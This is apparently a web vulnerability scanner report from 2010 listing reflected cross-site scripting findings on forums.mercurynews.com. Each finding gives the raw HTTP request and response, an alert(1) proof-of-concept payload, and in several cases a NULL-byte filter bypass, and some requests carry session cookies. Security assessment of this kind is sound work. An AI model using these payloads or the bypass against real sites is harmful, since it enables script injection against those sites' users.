X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16333
3.57. http://forums.mercurynews.com/forum/business-technology-business-news [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/business-technology-business-news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931e2"-alert(1)-"60a68e53a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/business-technology-business-news?931e2"-alert(1)-"60a68e53a4e=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20988
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ec4"-alert(1)-"16924a4f316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumf7ec4"-alert(1)-"16924a4f316/news HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:38 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22098
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54941"-alert(1)-"d801b306391 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/news54941"-alert(1)-"d801b306391 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:44 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16072
3.60. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9da1"-alert(1)-"992e5590b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/news?c9da1"-alert(1)-"992e5590b97=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:24 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19272
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef319"-alert(1)-"7ea175d2fc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsef319"-alert(1)-"7ea175d2fc0/forum/602 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22112
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ef166"-alert(1)-"5348053c353 was submitted in the REST URL parameter 2. This input was echoed as ef166"-alert(1)-"5348053c353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum%00ef166"-alert(1)-"5348053c353/602 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087dba"-alert(1)-"bd7fc6dfef5 was submitted in the REST URL parameter 3. This input was echoed as 87dba"-alert(1)-"bd7fc6dfef5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/602%0087dba"-alert(1)-"bd7fc6dfef5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:39 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cac3"-alert(1)-"ff2a2ccfa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums8cac3"-alert(1)-"ff2a2ccfa6/forum/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=7cf2c41678eb464964f8a0ac1163697f; expires=Wed, 08 Dec 2010 02:46:18 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:13:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22034
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f1250"-alert(1)-"6cf71db7b96 was submitted in the REST URL parameter 2. This input was echoed as f1250"-alert(1)-"6cf71db7b96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum%00f1250"-alert(1)-"6cf71db7b96/673 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:13:32 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ec6a4cd6b8b79036be9cc2544a3b80f1; expires=Wed, 08 Dec 2010 02:46:52 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:13:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21992
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00827f3"-alert(1)-"682449f4fa5 was submitted in the REST URL parameter 3. This input was echoed as 827f3"-alert(1)-"682449f4fa5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/673%00827f3"-alert(1)-"682449f4fa5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:13:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=96d5ff16ceb4d4857e2b1a534cbdbe8f; expires=Wed, 08 Dec 2010 02:47:18 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:14:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21992
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55459"-alert(1)-"f8751e5772f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0035e64"-alert(1)-"1c84bda8999 was submitted in the REST URL parameter 2. This input was echoed as 35e64"-alert(1)-"1c84bda8999 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0054fb5"-alert(1)-"d8ab2187b4c was submitted in the REST URL parameter 3. This input was echoed as 54fb5"-alert(1)-"d8ab2187b4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0031fdf"-alert(1)-"ae07d35c128 was submitted in the REST URL parameter 4. This input was echoed as 31fdf"-alert(1)-"ae07d35c128 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7fea7<script>alert(1)</script>441aed72aaa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the js_param1 request parameter is copied into the HTML document as plain text between tags. The payload 4134b<script>alert(1)</script>ea3b7054a28 was submitted in the js_param1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fc6"-alert(1)-"9628637350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsd7fc6"-alert(1)-"9628637350/poll HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:05 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=d014b033f451192e0b481c31c0f9c21f; expires=Wed, 08 Dec 2010 02:45:25 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22022
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00cc000"-alert(1)-"9c127b33533 was submitted in the REST URL parameter 2. This input was echoed as cc000"-alert(1)-"9c127b33533 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/poll%00cc000"-alert(1)-"9c127b33533 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 14 Nov 2010 23:12:30 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ba286c7c4afb5835084961bfc4371e7b; expires=Wed, 08 Dec 2010 02:45:50 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:54 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21987
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae6d"-alert(1)-"6579eb870fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0038e10"-alert(1)-"50952c2689f was submitted in the REST URL parameter 2. This input was echoed as 38e10"-alert(1)-"50952c2689f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00db1dc"-alert(1)-"884372cd347 was submitted in the REST URL parameter 3. This input was echoed as db1dc"-alert(1)-"884372cd347 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea44e"-alert(1)-"b9cbcd4d1f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrssea44e"-alert(1)-"b9cbcd4d1f1/forum/602/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22114
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861fb"-alert(1)-"f033e721dd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrss/forum861fb"-alert(1)-"f033e721dd3/602/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22114
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcc9"-alert(1)-"c5da668924b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrss/forum/602abcc9"-alert(1)-"c5da668924b/5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
